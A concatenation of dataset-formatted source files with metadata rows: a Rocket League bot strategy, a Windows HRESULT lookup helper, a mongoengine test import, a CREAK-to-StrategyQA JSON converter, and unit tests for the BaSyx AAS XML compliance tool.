| 37.226343 | 87 | 0.619766 | 4,814 | 29,111 | 3.489821 | 0.028251 | 0.074167 | 0.069643 | 0.096429 | 0.915298 | 0.874881 | 0.842798 | 0.79375 | 0.752024 | 0.702083 | 0 | 0.081037 | 0.200955 | 29,111 | 781 | 88 | 37.274008 | 0.641202 | 0 | 0 | 0.447167 | 0 | 0 | 0.044107 | 0 | 0 | 0 | 0 | 0 | 0.445636 | 1 | 0.042879 | false | 0 | 0.007657 | 0 | 0.050536 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
395096e5187ec5fb3359421a8017c93ceccd8139 | 17,556 | py | Python | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | RLBotPack/HP OMEN/omen.py | Dan-SmashRepair/RLBotPack | 638dd2dfae660e715dfa15c7cf7af71633090f5a | [
"MIT"
] | null | null | null | from gettext import find
from tools import *
from objects import *
from routines import *
from threading import local
from utils import *
import time
from rlbot.agents.base_agent import BaseAgent, SimpleControllerState
from rlbot.messages.flat.QuickChatSelection import QuickChatSelection
from rlbot.utils.structures.game_data_struct import GameTickPacket
from util.ball_prediction_analysis import find_slice_at_time
from util.boost_pad_tracker import BoostPadTracker
from util.drive import steer_toward_target
from util.sequence import Sequence, ControlStep
from util.vec import Vec3
#This file is for strategy
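# omen is a GoslingAgent; run() picks one action per tick: kickoff, shot, boost grab,
# defensive positioning, or a demolition run, with separate branches for 1v1 and team play.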
class omen(GoslingAgent):
def run(agent):
if len(agent.friends) == 0:
if agent.team > 0.1:
team_multiplier = 1
if agent.team < 0.1:
team_multiplier = -1
if agent.team == 0:
team_lol = 0
else:
team_lol = 1
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
future_ball = Vec3(0, 0, 0)
future_ball_2 = 0
ball_in_future = 0
ball_in_future_2 = 0
packet = GameTickPacket()
ball_prediction = agent.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, agent.time + 1)
ball_in_future_2 = find_slice_at_time(ball_prediction, agent.time + 2)
if ball_in_future is not None:
future_ball = Vec3(ball_in_future.physics.location)
elif ball_in_future_2 is not None:
future_ball = Vec3(ball_in_future_2.physics.location)
my_goal_to_ball,my_ball_distance = (agent.ball.location - agent.friend_goal.location).normalize(True)
goal_to_me = agent.me.location - agent.friend_goal.location
my_distance = my_goal_to_ball.dot(goal_to_me)
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
foe_goal_to_ball,foe_ball_distance = (agent.ball.location - agent.foe_goal.location).normalize(True)
foe_goal_to_foe = agent.foes[0].location - agent.foe_goal.location
foe_distance = foe_goal_to_ball.dot(foe_goal_to_foe)
closest_foe_to_ball = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.ball.location).magnitude() > (foe.location - agent.ball.location).magnitude():
closest_foe = foe
left_field = Vector3(4200*-side(agent.team),agent.ball.location.y + (1000*-side(agent.team)),0)
right_field = Vector3(4200*side(agent.team),agent.ball.location.y + (1000*side(agent.team)),0)
targets = {"goal": (agent.foe_goal.left_post, agent.foe_goal.right_post),
"upfield": (left_field, right_field),
"not_my_net": (agent.friend_goal.right_post, agent.friend_goal.left_post)}
shots = find_hits(agent, targets)
x = 1
me_onside = my_distance - 200 < my_ball_distance
foe_onside = foe_distance - 200 < foe_ball_distance
close = (agent.me.location - agent.ball.location).magnitude() < 3000
foe_close = (closest_foe_to_ball.location - agent.ball.location).magnitude() < 3000
have_boost = agent.me.boost > 20
defense_location = Vector3(agent.ball.location.x, agent.ball.location.y + (4000 * team_multiplier), 0)
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe.location - agent.me.location).magnitude() > (foe.location - agent.me.location).magnitude():
closest_foe = foe
x = 1
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255,255,255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0,255,0])
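# Helper: clear the stack and push a goto_boost routine towards the nearest active large boost pad.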
def get_closest_boost(agent):
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
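# Helper: drive at the nearest opponent and flip into them for a demolition attempt.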
def demo(agent):
relative_target = closest_foe.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
if (agent.me.location - closest_foe.location).magnitude() < 200:
agent.push(flip(agent.me.local(closest_foe.location - agent.me.location)))
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255,255,255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0,255,0])
if agent.team == 0:
agent.debug_stack()
if len(agent.stack) < 1:
if agent.kickoff_flag:
if agent.me.location.x > 300 or agent.me.location.x < -300:
agent.push(kickoff())
else:
agent.controller.throttle = 0
elif (agent.me.location - agent.friend_goal.location).magnitude() < 2000 and -1000 < agent.ball.location.x < 1000 and -1000 < closest_foe_to_ball.location.x < 1000:
if len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
elif (close and me_onside) and (foe_onside and foe_close) and (agent.me.location - agent.ball.location).magnitude() > 50 and agent.ball.location.z < 200:
while (agent.me.location - agent.ball.location).magnitude() > 50:
relative_target = agent.ball.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
break
elif (close and me_onside) or me_onside and (closest_foe_to_ball.location - agent.ball.location).magnitude() > (agent.me.location - agent.ball.location).magnitude():
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
elif len(shots["upfield"]) > 0:
agent.push(shots["upfield"][0])
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 6000:
agent.push(goto(defense_location))
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 4000 and (closest_foe.location - agent.ball.location).magnitude() > 3000 and agent.me.boost < 30 or (agent.ball.location - agent.friend_goal.location).magnitude() > 8000 and agent.me.boost < 30:
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
elif (agent.ball.location - agent.friend_goal.location).magnitude() < 5000 and len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
else:
demo(agent)
elif len(agent.friends) > 0:
if agent.team > 0.1:
team_multiplier = 1
if agent.team < 0.1:
team_multiplier = -1
if agent.team == 0:
team_lol = 0
else:
team_lol = 1
if len(agent.friends) > 0:
for friend in agent.friends:
if (agent.me.location - agent.ball.location).magnitude() > (friend.location - agent.ball.location).magnitude():
is_closest_friend_to_ball = False
else:
is_closest_friend_to_ball = True
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe.location - agent.me.location).magnitude() > (foe.location - agent.me.location).magnitude():
closest_foe = foe
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
future_ball = Vec3(0, 0, 0)
future_ball_2 = 0
ball_in_future = 0
ball_in_future_2 = 0
packet = GameTickPacket()
ball_prediction = agent.get_ball_prediction_struct()
ball_in_future = find_slice_at_time(ball_prediction, agent.time + 1)
ball_in_future_2 = find_slice_at_time(ball_prediction, agent.time + 2)
if ball_in_future is not None:
future_ball = Vec3(ball_in_future.physics.location)
elif ball_in_future_2 is not None:
future_ball = Vec3(ball_in_future_2.physics.location)
my_goal_to_ball, my_ball_distance = (agent.ball.location - agent.friend_goal.location).normalize(True)
goal_to_me = agent.me.location - agent.friend_goal.location
my_distance = my_goal_to_ball.dot(goal_to_me)
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
foe_goal_to_ball, foe_ball_distance = (agent.ball.location - agent.foe_goal.location).normalize(True)
foe_goal_to_foe = agent.foes[0].location - agent.foe_goal.location
foe_distance = foe_goal_to_ball.dot(foe_goal_to_foe)
closest_foe_to_ball = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.ball.location).magnitude() > (
foe.location - agent.ball.location).magnitude():
closest_foe_to_ball = foe
if len(agent.friends) > 0:
closest_friend_to_ball = agent.friends[0]
for friend in agent.friends:
if (closest_friend_to_ball.location - agent.ball.location).magnitude() > (
friend.location - agent.ball.location).magnitude():
closest_friend_to_ball = friend
closest_friend_to_goal = agent.friends[0]
for friend in agent.friends:
if (closest_friend_to_goal.location - agent.friend_goal.location).magnitude() > (
friend.location - agent.friend_goal.location).magnitude():
closest_friend_to_goal = friend
closest_friend = agent.friends[0]
for friend in agent.friends:
if (closest_friend.location - agent.me.location).magnitude() > (
friend.location - agent.me.location).magnitude():
closest_friend = friend
closest_foe = agent.foes[0]
for foe in agent.foes:
if (closest_foe_to_ball.location - agent.me.location).magnitude() > (
foe.location - agent.me.location).magnitude():
closest_foe = foe
left_field = Vector3(4200 * -side(agent.team), agent.ball.location.y + (1000 * -side(agent.team)), 0)
right_field = Vector3(4200 * side(agent.team), agent.ball.location.y + (1000 * side(agent.team)), 0)
targets = {"goal": (agent.foe_goal.left_post, agent.foe_goal.right_post),
"upfield": (left_field, right_field),
"not_my_net": (agent.friend_goal.right_post, agent.friend_goal.left_post)}
shots = find_hits(agent, targets)
x = 1
me_onside = my_distance - 200 < my_ball_distance
foe_onside = foe_distance - 200 < foe_ball_distance
close = (agent.me.location - agent.ball.location).magnitude() < 3000
foe_close = (closest_foe_to_ball.location - agent.ball.location).magnitude() < 3000
have_boost = agent.me.boost > 20
defense_location = Vector3(agent.ball.location.x, agent.ball.location.y + (4000 * team_multiplier), 0)
x = 1
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255, 255, 255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0, 255, 0])
def get_closest_boost(agent):
large_boosts = [boost for boost in agent.boosts if boost.large and boost.active]
closest_boost = large_boosts[0]
for item in large_boosts:
if (closest_boost.location - agent.me.location).magnitude() > (
item.location - agent.me.location).magnitude():
closest_boost = item
agent.stack = []
agent.push(goto_boost(closest_boost))
def demo(agent):
relative_target = closest_foe.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
if (agent.me.location - closest_foe.location).magnitude() < 200:
agent.push(flip(agent.me.local(closest_foe.location - agent.me.location)))
if agent.team == 0:
agent.debug_stack()
agent.line(agent.friend_goal.location, agent.ball.location, [255, 255, 255])
my_point = agent.friend_goal.location + (my_goal_to_ball * my_distance)
agent.line(my_point - Vector3(0, 0, 100), my_point + Vector3(0, 0, 100), [0, 255, 0])
if agent.team == 0:
agent.debug_stack()
if len(agent.stack) < 1:
if agent.kickoff_flag:
if (closest_friend_to_ball.location - agent.ball.location).magnitude() > (agent.me.location - agent.ball.location).magnitude() or (closest_friend_to_ball.location - agent.ball.location).magnitude() == (agent.me.location - agent.ball.location).magnitude() and closest_friend_to_ball.location.x < agent.me.location.x:
agent.push(kickoff())
else:
get_closest_boost(agent)
elif (close and me_onside) and (foe_onside and foe_close) and (
agent.me.location - agent.ball.location).magnitude() > 50 and agent.ball.location.z < 200 and (closest_friend_to_ball.location - agent.ball.location).magnitude() > 1000:
while (agent.me.location - agent.ball.location).magnitude() > 50:
relative_target = agent.ball.location - agent.me.location
local_target = agent.me.local(relative_target)
defaultPD(agent, local_target)
defaultThrottle(agent, 2300)
break
elif (close and me_onside) or (not foe_onside and me_onside) or (agent.me.location - agent.ball.location).magnitude() < (closest_friend_to_ball.location - agent.ball.location).magnitude() and me_onside:
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
elif len(shots["upfield"]) > 0:
agent.push(shots["upfield"][0])
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 4000 and (
closest_foe.location - agent.ball.location).magnitude() > 3000 and agent.me.boost < 30 or (
agent.ball.location - agent.friend_goal.location).magnitude() > 8000 and agent.me.boost < 30:
get_closest_boost(agent)
elif (agent.ball.location - agent.friend_goal.location).magnitude() > 5000 and (closest_friend_to_ball.location - agent.ball.location).magnitude() < (agent.me.location - agent.ball.location).magnitude():
demo(agent)
elif (agent.ball.location.y - agent.friend_goal.location.y) > 4000:
agent.push(goto(defense_location))
elif (agent.ball.location - agent.friend_goal.location).magnitude() < 4000 and len(shots["not_my_net"]) > 0:
agent.push(shots["not_my_net"][0])
else:
demo(agent)
| 53.039275 | 335 | 0.582308 | 2,105 | 17,556 | 4.647031 | 0.067933 | 0.094459 | 0.109487 | 0.084339 | 0.908812 | 0.886731 | 0.866387 | 0.861071 | 0.861071 | 0.845328 | 0 | 0.036668 | 0.314935 | 17,556 | 330 | 336 | 53.2 | 0.776669 | 0.001424 | 0 | 0.786765 | 0 | 0 | 0.008329 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018382 | false | 0 | 0.058824 | 0 | 0.080882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ab689a434c0a2be1718478c74519e57e2a34182 | 186 | py | Python | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | 2 | 2019-08-01T15:08:25.000Z | 2021-01-30T07:29:34.000Z | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | null | null | null | fs0GetHResultDefineName.py | SkyLined/mWindowsSDK | 931cc9d30316893662a3dc4e200dabe97122d216 | [
"CC-BY-4.0"
] | null | null | null | from .mWindowsConstants.dsHResultDefineName_by_uValue import dsHResultDefineName_by_uValue;
def fs0GetHResultDefineName(uHResult):
return dsHResultDefineName_by_uValue.get(uHResult);
| 37.2 | 91 | 0.887097 | 18 | 186 | 8.833333 | 0.611111 | 0.396226 | 0.509434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 0.05914 | 186 | 4 | 92 | 46.5 | 0.902857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
46f3be5bc8c1602bbcf543437ad01f991de45a03 | 197 | py | Python | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | null | null | null | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | 28 | 2016-11-30T03:15:18.000Z | 2022-02-25T15:57:02.000Z | tests/__init__.py | Rippling/mongoengine | c3b6fa6ffdfe05fcf6f49857c1a89fee0175a05f | [
"MIT"
] | 1 | 2021-11-10T05:33:18.000Z | 2021-11-10T05:33:18.000Z | from __future__ import absolute_import
from tests.all_warnings import AllWarnings
from tests.document import *
from tests.queryset import *
from tests.fields import *
from tests.migration import *
| 28.142857 | 42 | 0.832487 | 27 | 197 | 5.851852 | 0.444444 | 0.28481 | 0.379747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121827 | 197 | 6 | 43 | 32.833333 | 0.913295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
649e1ad64ebcb40ba329809013e4004161f0652b | 2,211 | py | Python | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | convert_data.py | cuizelin99/strategyqa | 1a7abf3dc98d5a0335126d9f4080ce376631be07 | [
"MIT"
] | null | null | null | import json
import sys
json_file = open(sys.argv[1])
creak_lines = json_file.readlines()
out_file = sys.argv[2]
#data = json.load(json_file)
with open(out_file, "w") as outfile:
outfile.write('[\n')
for i in range(len(creak_lines) - 2):
example = creak_lines[i]
outfile.write('\t{\n')
data = json.loads(example)
uid = data['ex_id']
entity = data['entity']
sentence = data['sentence']
label = data['label']
desc = ""
if '(' in entity and ')' in entity:
desc = entity.split('(')[1].split(')')[0]
entity = entity.split(' (')[0]
id_line = "\t\t\"qid\": \"{}\",\n".format(uid)
term_line = "\t\t\"term\": \"{}\",\n".format(entity)
description_line = "\t\t\"description\": \"{}\",\n".format(desc)
question_line = "\t\t\"question\": \"{}\",\n".format(sentence)
answer_line = "\t\t\"answer\": {},\n".format(label)
fact_line = "\t\t\"facts\": [],\n"
decomp_line = "\t\t\"decomposition\": [],\n"
evidence_line = "\t\t\"evidence\": []\n"
outfile.write(id_line)
outfile.write(term_line)
outfile.write(description_line)
outfile.write(question_line)
outfile.write(answer_line)
outfile.write(fact_line)
outfile.write(decomp_line)
outfile.write(evidence_line)
outfile.write('\t},\n')
example = creak_lines[-2]
outfile.write('\t{\n')
data = json.loads(example)
uid = data['ex_id']
entity = data['entity']
sentence = data['sentence']
label = data['label']
desc = ""
if '(' in entity and ')' in entity:
desc = entity.split('(')[1].split(')')[0]
entity = entity.split(' (')[0]
id_line = "\t\t\"qid\": \"{}\",\n".format(uid)
term_line = "\t\t\"term\": \"{}\",\n".format(entity)
description_line = "\t\t\"description\": \"{}\",\n".format(desc)
question_line = "\t\t\"question\": \"{}\",\n".format(sentence)
answer_line = "\t\t\"answer\": {},\n".format(label)
fact_line = "\t\t\"facts\": [],\n"
decomp_line = "\t\t\"decomposition\": [],\n"
evidence_line = "\t\t\"evidence\": []\n"
outfile.write(id_line)
outfile.write(term_line)
outfile.write(description_line)
outfile.write(question_line)
outfile.write(answer_line)
outfile.write(fact_line)
outfile.write(decomp_line)
outfile.write(evidence_line)
outfile.write('\t}\n')
outfile.write(']\n') | 32.043478 | 66 | 0.631389 | 318 | 2,211 | 4.254717 | 0.160377 | 0.195122 | 0.070953 | 0.04139 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0.842572 | 0 | 0.005173 | 0.125735 | 2,211 | 69 | 67 | 32.043478 | 0.694775 | 0.012212 | 0 | 0.8 | 0 | 0 | 0.123626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
649fc46b3782e29accaa8dc7d7945204f27eeded | 9,989 | py | Python | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 4 | 2022-01-07T01:30:49.000Z | 2022-02-21T07:58:14.000Z | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 5 | 2022-02-22T15:24:22.000Z | 2022-03-28T11:42:28.000Z | test/compliance_tool/test_compliance_check_xml.py | eclipse-basyx/basyx-sdk-python | 1249f49803a6ef5e594bb61410ad1c7939c2bdb7 | [
"MIT"
] | 2 | 2021-11-15T10:24:02.000Z | 2022-03-17T14:44:39.000Z | # Copyright (c) 2020 the Eclipse BaSyx Authors
#
# This program and the accompanying materials are made available under the terms of the MIT License, available in
# the LICENSE file of this project.
#
# SPDX-License-Identifier: MIT
import os
import unittest
import basyx.aas.compliance_tool.compliance_check_xml as compliance_tool
from basyx.aas.compliance_tool.state_manager import ComplianceToolStateManager, Status
class ComplianceToolXmlTest(unittest.TestCase):
def test_check_schema(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_found.xml')
compliance_tool.check_schema(file_path_1, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.FAILED, manager.steps[0].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[1].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[2].status)
self.assertIn("No such file or directory", manager.format_step(0, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_missing_submodels.xml')
compliance_tool.check_schema(file_path_3, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_schema(file_path_4, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_5 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_schema(file_path_5, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
def test_check_deserialization(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_found.xml')
compliance_tool.check_deserialization(file_path_1, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.FAILED, manager.steps[0].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[1].status)
self.assertIn("No such file or directory", manager.format_step(0, verbose_level=1))
manager.steps = []
file_path_2 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
compliance_tool.check_deserialization(file_path_2, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertIn("child of aas:assetAdministrationShells", manager.format_step(1, verbose_level=1))
self.assertIn("doesn't match the expected tag aas:assetAdministrationShell",
manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_deserializable_aas_warning.xml')
compliance_tool.check_deserialization(file_path_3, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertIn("ValueError: A revision requires a version", manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_deserialization(file_path_4, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
manager.steps = []
file_path_4 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_deserialization(file_path_4, manager)
self.assertEqual(2, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
def test_check_aas_example(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_2 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_aas_example(file_path_2, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
manager.steps = []
file_path_1 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
compliance_tool.check_aas_example(file_path_1, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[2].status)
self.assertIn("child of aas:assetAdministrationShells", manager.format_step(1, verbose_level=1))
self.assertIn("doesn't match the expected tag aas:assetAdministrationShell",
manager.format_step(1, verbose_level=1))
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example_wrong_attribute.xml')
compliance_tool.check_aas_example(file_path_3, manager)
self.assertEqual(3, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.FAILED, manager.steps[2].status)
self.assertIn('Asset administration shell AssetAdministrationShell[Identifier(IRI=https://acplt.org/'
'Test_AssetAdministrationShell)] must exist in given asset administrationshell list',
manager.format_step(2, verbose_level=1))
def test_check_xml_files_equivalence(self) -> None:
manager = ComplianceToolStateManager()
script_dir = os.path.dirname(__file__)
file_path_1 = os.path.join(script_dir, 'files/test_not_deserializable_aas.xml')
file_path_2 = os.path.join(script_dir, 'files/test_empty.xml')
compliance_tool.check_xml_files_equivalence(file_path_1, file_path_2, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.FAILED, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[4].status)
manager.steps = []
compliance_tool.check_xml_files_equivalence(file_path_2, file_path_1, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.FAILED, manager.steps[3].status)
self.assertEqual(Status.NOT_EXECUTED, manager.steps[4].status)
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
file_path_4 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
compliance_tool.check_xml_files_equivalence(file_path_3, file_path_4, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.SUCCESS, manager.steps[4].status)
manager.steps = []
file_path_3 = os.path.join(script_dir, 'files/test_demo_full_example.xml')
file_path_4 = os.path.join(script_dir, 'files/test_demo_full_example_wrong_attribute.xml')
compliance_tool.check_xml_files_equivalence(file_path_3, file_path_4, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.FAILED, manager.steps[4].status)
manager.steps = []
compliance_tool.check_xml_files_equivalence(file_path_4, file_path_3, manager)
self.assertEqual(5, len(manager.steps))
self.assertEqual(Status.SUCCESS, manager.steps[0].status)
self.assertEqual(Status.SUCCESS, manager.steps[1].status)
self.assertEqual(Status.SUCCESS, manager.steps[2].status)
self.assertEqual(Status.SUCCESS, manager.steps[3].status)
self.assertEqual(Status.FAILED, manager.steps[4].status)
self.assertIn('Asset administration shell AssetAdministrationShell[Identifier(IRI=https://acplt.org/'
'Test_AssetAdministrationShell)] must exist in given asset administrationshell list',
manager.format_step(4, verbose_level=1))
